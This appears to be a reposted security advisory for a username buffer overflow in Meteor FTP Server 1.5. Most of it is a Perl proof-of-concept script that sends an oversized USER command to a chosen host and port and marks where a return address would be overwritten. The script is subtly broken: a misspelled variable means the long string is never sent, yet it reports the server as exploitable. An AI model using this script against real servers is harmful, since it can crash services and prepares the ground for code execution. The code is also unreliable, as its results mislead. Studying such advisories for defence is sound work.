Meteor FTP Server Buffer Overflow (username)Summary
Meteor FTP is "a personal FTP server designed for the Microsoft Windows 98 and Windows Millennium Edition operating systems".
A buffer overflow vulnerability exists in Meteor FTP Server's handling of the username parameter, the following exploit code can be used to determine whether your version of Meteor FTP server is vulnerable or not.
Credit:
Details
Vulnerable Systems:
* Meteor FTP Server version 1.5
#!/usr/bin/perl
#
# 47meteor_bof.pl - PoC exploit for Meteor FTP Server
# version 1.5
# bug found by Anix44@gmail.com
#
# coded by k0r0l from acolytez team
# visit http://acolytez.com for details
#
use Net::FTP;
# geting data
$host = @ARGV[0];
$port = @ARGV[1];
$debug = @ARGV[2];
# ===========
$ftp_error = "Unable";
if (($host) && ($port))
{
# make exploit string
$exploit_string = "USER ";
$exploit_string .= "X"x80;
#$exploit_string .= "\n\n\n\n"; - it will be new return point !
# ===================
print "Trying to connect to $host:$port\n";
$sock = Net::FTP->new("$host",Port => $port, TimeOut => 30, Debug =>
$debug) or die "[-] Connection failed\n";
print "[+] Connect OK!\n";
print "Sending string...\n";
$sock->login($exploit_sting, "testpassword");
$answer = $sock->message;
if ($answer =~ m/$ftp_error/i)
{
print "\n[-] Sorry! Failed\n";
} else
{
print "\n[+] Send ok!\nServer can be explorated!\n\n";
}
}
else
{
print "\nMeteor FTP Server - PoC Exploit\n http://AcolyteZ.com\n\nUsing: $0 host port [debug: 1 or 0]\n\n";
}
推荐
评论(0条)
